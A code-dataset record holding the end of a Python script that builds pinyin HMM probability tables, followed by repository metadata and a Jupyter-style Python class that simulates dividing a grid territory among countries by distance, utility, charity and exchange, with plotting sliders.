with codecs.open(PY2HZ_FILE, 'r', 'utf-8') as fin:
while True:
line = fin.readline()
if not line: break
line = line.strip()
ls = line.split('=')
if len(ls) != 2:
raise Exception('invalid format')
py, chars = ls
py = py.strip()
chars = chars.strip()
if len(py)>0 and len(chars)>0:
data[py] = chars
writejson2file(data, FIN_PY2HZ_FILE)
def gen_start():
data = {'default': 1, 'data': None}
start = readdatafromfile(BASE_START_FILE)
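    # Smoothing: padding the denominator with HANZI_NUM pseudo-counts keeps
    # 'default' (= 1/count) as a nonzero prior for characters never observed
    # at the start of a sentence.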
count = HANZI_NUM
for hanzi in start:
count += start[hanzi]
for hanzi in start:
start[hanzi] = start[hanzi] / count
data['default'] = 1.0 / count
data['data'] = start
writejson2file(data, FIN_START_FILE)
def gen_emission():
"""
base_emission = {} #> {'泥': {'ni':1.0}, '了':{'liao':0.5, 'le':0.5}}
"""
data = {'default': 1.e-200, 'data': None}
emission = readdatafromfile(BASE_EMISSION_FILE)
for hanzi in emission:
num_sum = 0.
for pinyin in emission[hanzi]:
num_sum += emission[hanzi][pinyin]
for pinyin in emission[hanzi]:
emission[hanzi][pinyin] = emission[hanzi][pinyin] / num_sum
data['data'] = emission
writejson2file(data, FIN_EMISSION_FILE)
def gen_transition():
    """
    base_transition holds raw bigram counts per preceding character,
    e.g. {'你': {'好': 10, '们': 2}, '我': {}}.
    """
    data = {'default': 1./HANZI_NUM, 'data': None}
transition = readdatafromfile(BASE_TRANSITION_FILE)
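    # Laplace (add-one) smoothing: each observed bigram count gets +1 and the
    # denominator is padded with HANZI_NUM pseudo-counts, so unseen bigrams keep
    # the nonzero probability stored under each row's 'default'.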
for c1 in transition:
        num_sum = HANZI_NUM  # every character keeps a chance by default
for c2 in transition[c1]:
num_sum += transition[c1][c2]
for c2 in transition[c1]:
transition[c1][c2] = float(transition[c1][c2]+1) / num_sum
transition[c1]['default'] = 1./num_sum
data['data'] = transition
writejson2file(data, FIN_TRANSITION_FILE)
def main():
gen_py2hz()
gen_start()
gen_emission()
    gen_transition()
if __name__ == '__main__':
main()
|
[
"17307130191@fudan.edu.cn"
] |
17307130191@fudan.edu.cn
|
2e123c89f8d30f43907e5e3da0590091363d41cd
|
aded26493d24aa5d902498f4c8406a68993f9eca
|
/model.py
|
ebc06ba10c1988c0ff3d9dd65e81c124fdafa128
|
[] |
no_license
|
vampiirre/territorial-conflict
|
e88c7dbb07e8336d4c3c8e771e27918eda447b1e
|
5c107291f515e5856a3e19b024893148ae34acec
|
refs/heads/master
| 2020-05-27T16:02:37.596300
| 2020-05-19T15:17:56
| 2020-05-19T15:17:56
| 188,692,020
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 115,594
|
py
|
import matplotlib.pyplot as plt
import numpy as np
import matplotlib as mpl
import matplotlib.dates as mdates
import datetime as dt
import csv
import matplotlib.animation
from matplotlib import cm
from scipy.io import loadmat
import pandas as pd
import sys
import tqdm
from tqdm import tqdm_notebook
import pickle
import _pickle
import cvxpy
import random
import math
import copy
import ipywidgets as widgets  # successor of the removed IPython.html.widgets
from IPython.display import display, clear_output
from mpl_toolkits.mplot3d import Axes3D
import warnings
warnings.filterwarnings('ignore')
import time
%matplotlib notebook
%matplotlib notebook
class Territory:
    def __init__(self, name, row, column, resources, sphere = True, radius = 900.1, percent = False):  # declare a territory (name, height, width, number of resources, curved surface?, curvature radius)
        # parcel array: ([resources], root or EEZ?, country index + 1, [distances], [utilities], EEZ?)
        self.unos = [[[[0] * resources, False, -1, [], [], False] for i in range(column)] for i in range(row)]
        self.countries = []  # country array (priorities, satisfaction, roots, territories, EEZ)
        self.name = name  # territory name
        self.names = []  # country names
        self.ind = []  # per-country indicators used by charity and func_balance
        self.d = []  # utility bounds
        self.change_map = []  # list of map changes, used for animation
        self.change_sati = []  # satisfaction history for the histogram, from iteration 0 to the last
        self.start_map = []  # the initial map
        self.start_map_diff = []  # the initial map with the extended palette
        self.res_map = np.zeros((resources, row, column))  # resource maps
        self.dist_map = []  # distance maps
        self.sati_map = []  # utility maps
        self.transferable = []  # real parcels that can still be handed over
        self.i_char = 0  # number of parcels transferred by charity
        self.i_exch = 0  # number of parcels transferred by exchange
        self.i_exch2 = 0  # number of swaps performed by exchange
        self.isave = 0  # map-save indicator
        self.sphere = sphere  # is the surface curved?
        self.radius = radius  # curvature radius
        self.z = []  # third coordinate (from the north pole)
        self.inline = 0  # inline counter for matplotlib
        self.angle1 = 30  # first angle for the 3D view
        self.angle2 = 30  # second angle for the 3D view
        self.list_exchange = []  # neighbours in country i that could pass to country j
        self.map_exchange = []  # neighbour map of every parcel
        self.started = []  # per-country parcel lists used as intermediate data for distance computations
        self.exchanged = [{}, {}, {}]  # dictionaries with statistics about exchange()
        self.percent = percent  # is the model percentage-based?
        self.full = []  # for the percentage model: what 100% satisfaction equals for each country
        if self.sphere:  # fill self.z
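            # z = R - sqrt(R^2 - r^2) is the sagitta of a spherical cap, with r the
            # parcel's planar distance from the grid centre: it lifts the flat grid
            # onto a sphere of radius `radius`.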
            for i in range(row):
                self.z.append([])
                for j in range(column):  # third coordinate, accounting for the curvature
                    self.z[i].append(self.radius - pow(pow(self.radius, 2) - ((pow(i - row/2 + 0.5, 2) + pow(j - column/2 + 0.5, 2))), 0.5))
        else:
            for i in range(row):
                self.z.append([])
                for j in range(column):
                    self.z[i].append(0)
    ### USER-FACING FUNCTIONS ###
    ## MAP EDITING ##
    # ADD A COUNTRY (name, priorities, utility bounds)
    def add_country(self, name, priorities, dis):
        self.countries.append([priorities, 0, [], [], []])  # priorities, satisfaction, roots, territories, EEZ
        self.ind.append(0)  # add the indicator
        self.full.append(0)
        self.names.append(name)  # store the name
        self.d.append(dis)  # store the utility bounds
        for i in range(len(self.unos)):
            for j in range(len(self.unos[0])):  # add a distance slot and a utility slot to every parcel
                self.unos[i][j][3].append(0)
                self.unos[i][j][4].append(0)
        self.dist_map.append(np.ones((len(self.unos), len(self.unos[0]))) * -1)  # add a distance map
        self.sati_map.append(np.ones((len(self.unos), len(self.unos[0]))) * -1)  # add a utility map
    # ADD A RESOURCE TO A RANGE OF PARCELS (resource index, first row, first column,
    # last row, last column)
    def add_resources(self, n, ff, fl, lf, ll, r = 1):
        for i in tqdm_notebook(range(ff, lf+1), total= lf + 1 - ff, desc="Add Resource " + str(n)):
            for j in range(fl, ll+1):
                self.add_resource(n, i, j, r)  # edit each parcel in turn
    # ADD A RESOURCE TO ONE PARCEL (resource index, parcel row, parcel column)
    def add_resource(self, n, f, l, r = 1):
        self.unos[f][l][0][n] = r  # set this resource's indicator on the parcel
        self.res_map[n][f][l] *= (1 + r)  # update the resource map
    # DECLARE PARCELS REAL (first row, first column, last row, last column)
    def add_reals(self, ff, fl, lf, ll):  # ff fl - first coordinate, lf ll - last coordinate
        for i in tqdm_notebook(range(ff, lf+1), total= lf + 1 - ff, desc="Add Real"):
            for j in range(fl, ll+1):
                self.add_real(i, j)  # edit each parcel in turn
    # DECLARE ONE PARCEL REAL (parcel row, parcel column)
    def add_real(self, f, l):
        self.unos[f][l][2] = 0  # set the country-ownership index (0 = unowned)
        for k in range(len(self.res_map)):
            self.res_map[k][f][l] = 1  # update the resource maps
        if [f, l] not in self.transferable:
            self.transferable.append([f, l])  # add the parcel to the transferable set
    # DECLARE PARCELS ROOTS OF A COUNTRY (country index, first row, first column, last row, last column)
    def add_roots(self, n, ff, fl, lf, ll):  # ff, fl - 1st coor, lf, ll - 2nd coor
        for i in tqdm_notebook(range(ff, lf+1), total= lf + 1 - ff, desc="Add Root of " + self.names[n]):
            for j in range(fl, ll+1):
                self.add_root(n, i, j)  # edit each parcel in turn
    # DECLARE ONE PARCEL A ROOT OF A COUNTRY (country index, parcel row, parcel column)
    def add_root(self, n, f, l):
        if self.unos[f][l][2] == 0:  # only if the parcel is already real
            self.transferable.remove([f, l])  # remove it from the transferable set
            self.countries[n][2].append([f, l])  # add it to the country's roots
            self.unos[f][l][2] = n + 1  # set the parcel's country-ownership index
            self.unos[f][l][1] = True  # set the parcel's root-or-EEZ flag
            for k in range(len(self.countries)):  # mark the parcel unavailable on every other country's maps
                if (k != n):
                    self.dist_map[k][f][l] = -2
                    self.sati_map[k][f][l] = -2
                else:
                    self.dist_map[k][f][l] = 0
                    self.sati_map[k][f][l] = 0
    ## MAP PREPROCESSING ##
    # COMPUTES PARCEL DISTANCES AND UTILITIES AND THE COUNTRIES' INITIAL SATISFACTION
    def started_pack(self, d = 52.4):
        for k in range(len(self.countries)):
            self.started.append([])
            for i, j in self.countries[k][2]:
                z = self.z[i][j]
                if(((i == 0) or (self.unos[i-1][j][2] != k + 1)) or ((i == len(self.unos) - 1) or (self.unos[i+1][j][2] != k + 1)) or
                   ((j == 0) or (self.unos[i][j-1][2] != k + 1)) or ((j == len(self.unos[0]) - 1) or (self.unos[i][j+1][2] != k + 1))):
                    self.started[k].append([i, j, z])
        for i in tqdm_notebook(range(len(self.unos)), total=len(self.unos), desc="Started pack"):
            for j in range(len(self.unos[0])):
                if (self.unos[i][j][1] == False) and (self.unos[i][j][2] >= 0):  # if the parcel can be transferred
                    for k in range(len(self.countries)):
                        dista = self.dist(i, j, k)  # distance from the parcel to country k
                        self.unos[i][j][3][k] = dista  # store it in the parcel's distance list
                        self.dist_map[k][i][j] = dista  # update the distance map
                    if min(self.unos[i][j][3]) > d:
                        for k in range(len(self.countries)):
                            satis = self.sati(i, j, k)
                            self.unos[i][j][4][k] = satis  # store it in the parcel's utility list
                            self.sati_map[k][i][j] = satis  # update the utility map
                            if self.percent:
                                self.full[k] += satis
                            else:
                                self.countries[k][1] -= satis  # update the country's satisfaction level
                    else:
                        country = self.unos[i][j][3].index(min(self.unos[i][j][3]))
                        self.belong(i, j, country, 'EEZ ')  # hand the parcel to the nearest country
                        self.unos[i][j][1] = True  # set the root-or-EEZ flag
                        self.transferable.remove([i, j])  # remove it from the transferable list
                        self.countries[country][4].append([i, j])  # add it to the country's EEZ list
                        self.unos[i][j][5] = True  # set the EEZ flag
        if self.percent:
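            # Percent mode: rescale every utility so each country's total available
            # utility sums to 100, turning satisfaction into a percentage.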
            for i in range(len(self.unos)):
                for j in range(len(self.unos[0])):
                    for k in range(len(self.countries)):
                        self.unos[i][j][4][k] = self.unos[i][j][4][k] / self.full[k] * 100
                        if self.sati_map[k][i][j] > 0:
                            self.sati_map[k][i][j] = self.sati_map[k][i][j] / self.full[k] * 100
        if self.percent == False:
            self.change_sati.append(np.array(self.countries)[:, 1].astype(int).tolist())  # record the initial satisfaction vector
        else:
            self.change_sati.append([round(x, 3) for x in np.array(self.countries)[:, 1]])  # record the initial satisfaction vector
        self.start_map = np.array(self.unos)[:, :, 2].astype(int).tolist()  # store the starting map and its extended-palette version
        self.start_map_diff = (np.array(self.unos)[:, :, 2].astype(int) * 3 - 2 * np.sign(np.array(self.unos)[:, :, 2].astype(int))).tolist()
        self.started = []
    ## INITIAL MAP-PARTITIONING FUNCTIONS ##
    # PROXIMITY FUNCTION: gives every parcel to the nearest country
    def func_distance(self):
        for elem in tqdm_notebook(self.transferable, total= len(self.transferable), desc="Func Distance"):
            self.belong(elem[0], elem[1], self.near(elem[0], elem[1]), 'Func Distance ')  # hand the parcel to the nearest country
        self.make_exch()  # build the maps of admissible exchanges
    # UTILITY FUNCTION: gives every parcel to the country it benefits most
    def func_satisfation(self):
        for elem in tqdm_notebook(self.transferable, total= len(self.transferable), desc="Func Satisfaction"):
            self.belong(elem[0], elem[1], self.most_sati(elem[0], elem[1]), 'Func Satisfaction ')  # hand the parcel to the country that needs it most
        self.make_exch()  # build the maps of admissible exchanges
    # FAIRNESS FUNCTION: the poorest country takes its most valuable parcel, and so on round-robin
    def func_balance(self):
        empty = 0  # flag: the countries have nothing left to take
        for k in tqdm_notebook(range(len(self.transferable) + len(self.countries) - 1),  # until the free parcels run out
                               total= len(self.transferable) + len(self.countries) - 1, desc="Func Balance"):
            if empty == 0:  # if something can still be handed out
                min_coun = self.min_sat()[1]  # find the least-satisfied country
                max_sati = 0  # best satisfaction gain found so far
                maxf = 0  # parcel's first coordinate
                maxl = 0  # parcel's second coordinate
                for elem in self.transferable:  # for every free parcel
                    i = elem[0]  # first coordinate
                    j = elem[1]  # second coordinate
                    if (((i != 0 and (self.unos[i - 1][j][2] == min_coun + 1)) or  # does the parcel border that country
                         (j != 0 and (self.unos[i][j - 1][2] == min_coun + 1)) or
                         (j != len(self.unos[0]) - 1 and (self.unos[i][j + 1][2] == min_coun + 1)) or
                         (i != len(self.unos) - 1 and (self.unos[i + 1][j][2] == min_coun + 1)))
                        and self.unos[i][j][2] == 0 and (max_sati < self.unos[i][j][4][min_coun] or  # is this parcel better
                        (max_sati == self.unos[i][j][4][min_coun] and
                         self.unos[maxf][maxl][3][min_coun] > self.unos[i][j][3][min_coun]))):
                        max_sati = self.unos[i][j][4][min_coun]  # it is now the best candidate
                        maxf = i  # record its first coordinate
                        maxl = j  # record its second coordinate
                if max_sati != 0:  # if the gain is positive, hand the parcel over
                    self.belong(maxf, maxl, min_coun, 'Func Balance ')
                elif self.ind.count(0) > 1:  # if the gain is zero, flip the country's "done" indicator
                    self.ind[min_coun] = 1
                else:  # once every indicator is set, the distribution is over
                    empty = 1  # flip the end-of-distribution flag
                    for element in self.transferable:  # give the remaining parcels to the nearest countries
                        if self.unos[element[0]][element[1]][2] == 0:
                            self.belong(element[0], element[1], self.near(element[0], element[1]), 'Func Balance ')
        for i in range(len(self.ind)):  # reset the self.ind indicators to zero
            self.ind[i] = 0
        self.make_exch()  # build the maps of admissible exchanges
    ## ADDITIONAL-PROCESSING FUNCTIONS ##
    # CHARITY RAISES THE MINIMUM SATISFACTION: THE "RICH" COUNTRIES GIVE TO THE "POOR"
    def charity(self):
        last_step = np.array(self.countries)[:, 1].astype(float)  # remember the current satisfaction levels
        self.total_charity()  # transfer parcels from all "rich" countries to all "poor" ones
        while ((np.array(self.countries)[:, 1].astype(float) != last_step).sum() != 0):  # repeat while the satisfaction levels keep changing
            last_step = np.array(self.countries)[:, 1].astype(float)
            self.total_charity()
    # EXCHANGE TRIES PAIRWISE SWAPS BETWEEN ANY TWO COUNTRIES WITHOUT LOWERING EITHER COUNTRY'S SATISFACTION
    # parameters: sizes of the random parcel blocks to swap, and attempts allowed per country pair
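    # Note: besides equal-sized swaps of sides[0] parcels, blocks of `elem` parcels
    # are tried against `2 * sides[0] - elem` in both directions, so countries can
    # trade different numbers of parcels as long as neither side loses satisfaction.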
    def exchange(self, sides = [8, 6, 4], attempts = 16, safe = False):
        success = 1  # counter of successful swaps
        while success != 0:  # while swaps keep happening
            if safe:
                self.make_exch()  # rebuild the maps of admissible exchanges
            success = 0  # reset the swap counter
            for i in range(len(self.countries)):
                for j in range(len(self.countries)):  # for every pair of countries that can exchange
                    if i != j and len(self.list_exchange[i][j]) != 0 and len(self.list_exchange[j][i]) != 0:
                        ntry = 0  # reset the failed-attempt counter
                        result = 0  # reset the swap-success flag
                        while ntry != attempts:  # until the failure counter reaches the attempt limit
                            result = self.exch(i, j, sides[0], sides[0], ntry)  # try to swap random parcel blocks
                            if not result:  # on failure, bump the failed-attempt counter
                                ntry += 1
                            else:  # on success, reset the counter and raise the success flag
                                ntry = 0
                                success = 1
                        for elem in sides[1:]:
                            ntry = 0  # reset the failed-attempt counter
                            result = 0  # reset the swap-success flag
                            while ntry != attempts:  # until the failure counter reaches the attempt limit
                                result = self.exch(i, j, elem, 2 * sides[0] - elem, ntry)  # try to swap random parcel blocks
                                if not result:  # on failure, bump the failed-attempt counter
                                    ntry += 1
                                else:  # on success, reset the counter and raise the success flag
                                    ntry = 0
                                    success = 1
                            ntry = 0  # reset the failed-attempt counter
                            result = 0  # reset the swap-success flag
                            while ntry != attempts:  # until the failure counter reaches the attempt limit
                                result = self.exch(i, j, 2 * sides[0] - elem, elem, ntry)  # try to swap random parcel blocks
                                if not result:  # on failure, bump the failed-attempt counter
                                    ntry += 1
                                else:  # on success, reset the counter and raise the success flag
                                    ntry = 0
                                    success = 1
    # COMBINATION OF CHARITY AND EXCHANGE
    # parameters: block sizes for exchange() and the number of swap attempts
    def char_exch(self, sides = [8, 6, 4], attempts = 16, safe = False):
        last_step = np.array(self.countries)[:, 1].astype(float)  # remember the current satisfaction levels
        self.charity()  # transfer parcels from the "rich" to the "poor"
        self.exchange(sides, attempts, safe)  # perform mutually beneficial swaps
        while ((np.array(self.countries)[:, 1].astype(float) != last_step).sum() != 0):  # while the satisfaction levels keep changing
            last_step = np.array(self.countries)[:, 1].astype(float)  # remember the current satisfaction levels
            self.charity()  # transfer parcels from the "rich" to the "poor"
            self.exchange(sides, attempts, safe)  # perform mutually beneficial swaps
def connectedness(self):
self.transferable = []
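        # Flood fill each country's territory from its roots and EEZ parcels;
        # any owned parcel never reached below is disconnected from the mainland
        # and gets returned to the transferable pool.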
for i in range(len(self.countries)):
root = self.countries[i][2] + self.countries[i][4]
old = []
new = []
            for k in tqdm_notebook(range(len(self.countries[i][2]) + len(self.countries[i][3]) + len(self.countries[i][4])),  # until the country's parcels run out
                                   total= (len(self.countries[i][2]) + len(self.countries[i][3]) + len(self.countries[i][4])), desc="Connectedness" + self.names[i]):
if root != []:
elem = [root[0][0] - 1, root[0][1]]
if (elem[0] >= 0) and ((self.unos[elem[0]][elem[1]][2] - 1) == i) and (self.unos[elem[0]][elem[1]][1] == False) and (elem not in old) and (elem not in new):
new.append(elem)
elem = [root[0][0], root[0][1] - 1]
if (elem[1] >= 0) and ((self.unos[elem[0]][elem[1]][2] - 1) == i) and (self.unos[elem[0]][elem[1]][1] == False) and (elem not in old) and (elem not in new):
new.append(elem)
elem = [root[0][0] + 1, root[0][1]]
if (elem[0] < len(self.unos)) and ((self.unos[elem[0]][elem[1]][2] - 1) == i) and (self.unos[elem[0]][elem[1]][1] == False) and (elem not in old) and (elem not in new):
new.append(elem)
elem = [root[0][0], root[0][1] + 1]
if (elem[1] < len(self.unos[0])) and ((self.unos[elem[0]][elem[1]][2] - 1) == i) and (self.unos[elem[0]][elem[1]][1] == False) and (elem not in old) and (elem not in new):
new.append(elem)
root = root[1:]
else:
if new != []:
if new[0] not in old:
elem = [new[0][0] - 1, new[0][1]]
if (elem[0] >= 0) and ((self.unos[elem[0]][elem[1]][2] - 1) == i) and (self.unos[elem[0]][elem[1]][1] == False) and (elem not in old) and (elem not in new):
new.append(elem)
elem = [new[0][0], new[0][1] - 1]
if (elem[1] >= 0) and ((self.unos[elem[0]][elem[1]][2] - 1) == i) and (self.unos[elem[0]][elem[1]][1] == False) and (elem not in old) and (elem not in new):
new.append(elem)
elem = [new[0][0] + 1, new[0][1]]
if (elem[0] < len(self.unos)) and ((self.unos[elem[0]][elem[1]][2] - 1) == i) and (self.unos[elem[0]][elem[1]][1] == False) and (elem not in old) and (elem not in new):
new.append(elem)
elem = [new[0][0], new[0][1] + 1]
if (elem[1] < len(self.unos[0])) and ((self.unos[elem[0]][elem[1]][2] - 1) == i) and (self.unos[elem[0]][elem[1]][1] == False) and (elem not in old) and (elem not in new):
new.append(elem)
old.append(new[0])
new = new[1:]
copy_terr = copy.deepcopy(self.countries[i][3])
for elem in copy_terr:
if elem not in old:
self.transferable.append(elem)
self.countries[i][1] -= (2 - self.percent) * self.unos[elem[0]][elem[1]][4][i]
self.unos[elem[0]][elem[1]][2] = 0
self.countries[i][3].remove([elem[0], elem[1]])
    ## OUTPUT FUNCTIONS ##
    # PRINTS STATISTICS ABOUT THE RESULTS OF exchange()
    def exchange_info(self):
        di0 = sorted(self.exchanged[0].items(), key=lambda item: -item[1])
        di1 = sorted(self.exchanged[1].items(), key=lambda item: -item[1])
        di2 = sorted(self.exchanged[2].items(), key=lambda item: -item[1])
        print('Block size in the settings and the number of such swaps')
        for i in range(len(di0)):
            print(di0[i][0], di0[i][1])
        print('Number of parcels each country contributed to a swap and the number of such swaps')
        for i in range(len(di1)):
            print(di1[i][0], di1[i][1])
        print('Number of parcels involved in a swap and the number of such swaps')
        for i in range(len(di2)):
            print(di2[i][0], di2[i][1])
    # PRINTS THE ENVY TABLE: THE COUNTRY IN A ROW ENVIES THE COUNTRY IN A COLUMN
    def envy_free(self):
        env = [['']]  # the envy table
        for i in range(len(self.countries)):
            env[0].append(self.names[i])  # header row of country names
        for i in range(len(self.countries)):
            env.append([self.names[i]])  # left column of country names
            for j in range(len(self.countries)):
                env[i + 1].append(self.envy(i, j))  # fill the table
        max_len = max([len(str(e)) for r in env for e in r])
        for row in env:
            print(*list(map('{{:>{length}}}'.format(length= max_len).format, row)))  # print the table row by row
    # PRINTS THE COUNTRIES' CURRENT SATISFACTION
    def countries_sati(self):
        sat_c = []  # list of country satisfactions
        for i in range(len(self.countries)):
            sat_c.append([self.names[i], self.countries[i][1]])  # fill the satisfaction list
        max_len = max([len(str(e)) for r in sat_c for e in r])
        for row in sat_c:
            print(*list(map('{{:>{length}}}'.format(length= max_len).format, row)))  # print the satisfaction list
    # SLIDER OVER MAP CHANGES (interval to inspect, histogram?, extended palette?)
    def slider(self, interval = "All", hist = False, diff = True):
        if self.inline == 0:  # matplotlib setup
            %matplotlib inline
            self.inline = 1
        def update_iteration(value):  # iteration callback for the slider
            update_map(iteration = value['new'])
        def update_map(iteration = 0):  # redraw the map
            clear_output(wait=True)  # clear the output
            now_map = copy.deepcopy(start_map)  # the base map (changes are applied on top of it)
            if diff:  # extended palette
                for i in range(iteration):
                    now_map[change_map[i][0]][change_map[i][1]] = change_map[i][2] * 3 - (change_map[i][3] == "EEZ ")  # apply the change
            else:  # plain palette
                for i in range(iteration):
                    now_map[change_map[i][0]][change_map[i][1]] = change_map[i][2]  # apply the change
            plt.imshow(now_map, cmap = cm.viridis)  # draw the map
            plt.show()
            if hist:  # if a histogram was requested
                fig = plt.figure(figsize=(5, 5))  # histogram setup
                mpl.rcParams.update({'font.size': 10})
                ax = plt.axes()
                ranges = (np.array(self.change_sati).max() - np.array(self.change_sati).min()) * 0.1
                plt.ylim([np.array(self.change_sati).min() - ranges, np.array(self.change_sati).max() + ranges])
                plt.xlim( -0.5, len(self.names))
                mpl.rcParams.update({'font.size': 10})
                for i in range(len(self.names)):
                    ax.text(i + 0.15, self.change_sati[start + iteration][i], self.change_sati[start + iteration][i])
                ax.yaxis.grid(True, zorder = 1)
                plt.bar([i for i in range(len(self.names))], self.change_sati[start+iteration],
                        width = 0.3, color = 'blue', alpha = 0.7, zorder = 2)
                plt.xticks(range(len(self.names)), self.names, rotation=30)
                plt.legend(loc='upper right')
            slider = widgets.IntSlider(iteration, min = 0, max = len(change_map))  # iteration slider
            label = widgets.Label(value = 'Iteration ' + str(iteration) + ((start!=0)*('(' + str(start + iteration) + ')')) + ' of ' + str(len(change_map)) + (' ' + change_map[slider.value - 1][3]) * (slider.value != 0))
            display(slider, label)
            slider.observe(update_iteration, names = 'value')
        # choose the interval to display
        if interval == "All":  # the whole history
            start = 0
            end = len(self.change_map)
        elif isinstance(interval[0], int):  # the interval is given numerically
            if interval[0] < 0:
                interval[0] += len(self.change_map)
            if interval[1] <= 0:
                interval[1] += len(self.change_map)
            start = interval[0]
            end = interval[1]
        else:  # the interval is given by function names
            start = 0
            end = len(self.change_map)
            for i in range(len(self.change_map)):
                if self.change_map[i][3][:-1] in interval or self.change_map[i][3][:8] == 'Exchange' and 'Exchange' in interval:
                    start = i
                    break
            for i in range(len(self.change_map) - 1, -1, -1):
                if self.change_map[i][3][:-1] in interval or self.change_map[i][3][:8] == 'Exchange' and 'Exchange' in interval:
                    end = i + 1
                    break
        if diff:  # extended palette
            start_map = copy.deepcopy(self.start_map_diff)  # the base map
            for i in range(start):  # apply the changes up to `start`
                start_map[self.change_map[i][0]][self.change_map[i][1]] = self.change_map[i][2] * 3 - (self.change_map[i][3] == "EEZ ")
        else:  # plain palette
            start_map = copy.deepcopy(self.start_map)  # the base map
            for i in range(start):  # apply the changes up to `start`
                start_map[self.change_map[i][0]][self.change_map[i][1]] = self.change_map[i][2]
        change_map = self.change_map[start:end]  # the list of changes to scrub through
        plt.imshow(start_map, cmap = cm.viridis)  # draw the map
        plt.show()
        if hist:  # if a histogram was requested
            fig = plt.figure(figsize=(5, 5))  # histogram setup
            mpl.rcParams.update({'font.size': 10})
            ax = plt.axes()
            ranges = (np.array(self.change_sati).max() - np.array(self.change_sati).min()) * 0.1
            plt.ylim([np.array(self.change_sati).min() - ranges, np.array(self.change_sati).max() + ranges])
            plt.xlim( -0.5, len(self.names))
            mpl.rcParams.update({'font.size': 10})
            for i in range(len(self.names)):
                ax.text(i + 0.15, self.change_sati[start][i], self.change_sati[start][i])
            ax.yaxis.grid(True, zorder = 1)
            plt.bar([i for i in range(len(self.names))], self.change_sati[start],
                    width = 0.3, color = 'blue', alpha = 0.7, zorder = 2)
            plt.xticks(range(len(self.names)), self.names, rotation=30)
            plt.legend(loc='upper right')
        slider = widgets.IntSlider(0, min = 0, max = len(change_map))  # iteration slider
        label = widgets.Label(value = 'Iteration 0' + ((start!=0)*('(' + str(start) + ')')) + ' of ' + str(len(change_map)) + (' ' + change_map[slider.value - 1][3]) * (slider.value != 0))
        display(slider, label)
        slider.observe(update_iteration, names = 'value')
    # 3D VIEW (interval, extended palette?, parcel stride, parcel size)
    def globus(self, interval = "All", diff = False, interv = 15, scale = 1.5):
        if self.inline >= 1:  # matplotlib setup
            for i in range(self.inline):
                %matplotlib notebook
            %matplotlib notebook
            self.inline = 0
        # choose the interval to display
        if interval == "All":  # the whole history
            start = 0
            end = len(self.change_map)
        elif isinstance(interval[0], int):  # the interval is given numerically
            if interval[0] < 0:
                interval[0] += len(self.change_map)
            if interval[1] <= 0:
                interval[1] += len(self.change_map)
            start = interval[0]
            end = interval[1]
        else:  # the interval is given by function names
            start = 0
            end = len(self.change_map)
            for i in range(len(self.change_map)):
                if self.change_map[i][3][:-1] in interval or self.change_map[i][3][:8] == 'Exchange' and 'Exchange' in interval:
                    start = i
                    break
            for i in range(len(self.change_map) - 1, -1, -1):
                if self.change_map[i][3][:-1] in interval or self.change_map[i][3][:8] == 'Exchange' and 'Exchange' in interval:
                    end = i + 1
                    break
        if diff:  # extended palette
            start_map = copy.deepcopy(self.start_map_diff)  # the base map
            for i in range(start):  # apply the changes up to `start`
                start_map[self.change_map[i][0]][self.change_map[i][1]] = self.change_map[i][2] * 3 - (self.change_map[i][3] == "EEZ ")
        else:  # plain palette
            start_map = copy.deepcopy(self.start_map)  # the base map
            for i in range(start):  # apply the changes up to `start`
                start_map[self.change_map[i][0]][self.change_map[i][1]] = self.change_map[i][2]
        change_map = self.change_map[start:end]  # the list of changes to scrub through
        x = []  # first coordinate
        y = []  # second coordinate
        z = []  # third coordinate
        colors = []  # point colours
        maxi = max(len(self.unos), len(self.unos[0]), max(max(self.z)) - min(min(self.z)))  # largest coordinate extent
        # offset the points so the grid sits in the middle of the cube
        # (the palette does not change the point layout, so one loop serves both modes)
        for i in range(0, len(self.unos), interv):
            for j in range(0, len(self.unos[0]), interv):
                if self.unos[i][j][2] > 0:
                    x.append((maxi - len(self.unos))/2 + i)
                    y.append((maxi - len(self.unos[0]))/2 + j)
                    z.append((maxi + max(max(self.z)))/2 - self.z[i][j])
                    colors.append(start_map[i][j])
        fig = plt.figure(figsize=(5,5))  # 3D figure setup
        ax = fig.add_subplot(111, projection='3d')
        ax.set_xlabel('X axis')
        ax.set_ylabel('Y axis')
        ax.set_zlabel('Z axis')
        ax.set_xlim([0, maxi])
        ax.set_ylim([0, maxi])
        ax.set_zlim([0, maxi])
        ax.scatter(x, y, z, c=colors, cmap=cm.viridis, s = 2 * interv * scale)
        ax.view_init(30, 30)
        plt.show()
        def update_plot(angle1 = 30, angle2 = 30):  # view-angle update callback
            self.angle1 = angle1
            self.angle2 = angle2
            ax.view_init(angle1, angle2)
            fig.canvas.draw_idle()
        angle1_slider = widgets.IntSlider(30, min = -180, max = 180)  # first-angle slider
        display(angle1_slider)
        angle2_slider = widgets.IntSlider(30, min = -180, max = 180)  # second-angle slider
        display(angle2_slider)
        slider = widgets.IntSlider(0, min = 0, max = len(change_map))  # iteration slider
        label = widgets.Label(value = 'Iteration 0' + ((start!=0)*('(' + str(start) + ')')) + ' of ' + str(len(change_map)) + (' ' + change_map[slider.value - 1][3]) * (slider.value != 0))
        display(slider, label)
        # update callbacks for the sliders
        def update_angle1(value):
            update_plot(angle1 = value['new'], angle2 = self.angle2)
        def update_angle2(value):
            update_plot(angle1 = self.angle1, angle2 = value['new'])
        def update_iteration(value):  # iteration callback
            update_map(iteration = value['new'])
        def update_map(iteration = 0):  # redraw the map
            clear_output(wait=True)  # clear the output
            now_map = copy.deepcopy(start_map)  # the base map (changes are applied on top of it)
            if diff:  # extended palette
                for i in range(iteration):
                    now_map[change_map[i][0]][change_map[i][1]] = change_map[i][2] * 3 - (change_map[i][3] == "EEZ ")  # apply the change
            else:  # plain palette
                for i in range(iteration):
                    now_map[change_map[i][0]][change_map[i][1]] = change_map[i][2]  # apply the change
            colors = []
            for i in range(0, len(self.unos), interv):
                for j in range(0, len(self.unos[0]), interv):
                    if self.unos[i][j][2] > 0:
                        colors.append(now_map[i][j])
            fig = plt.figure(figsize=(5,5))
            ax = fig.add_subplot(111, projection='3d')
            ax.set_xlabel('X axis')
            ax.set_ylabel('Y axis')
            ax.set_zlabel('Z axis')
            ax.set_xlim([0, maxi])
            ax.set_ylim([0, maxi])
            ax.set_zlim([0, maxi])
            ax.scatter(x, y, z, c=colors, cmap=cm.viridis, s = 2 * interv * scale)
            ax.view_init(self.angle1, self.angle2)
            plt.show()
            angle1_slider = widgets.IntSlider(self.angle1, min = -180, max = 180)
            display(angle1_slider)
            angle2_slider = widgets.IntSlider(self.angle2, min = -180, max = 180)
            display(angle2_slider)
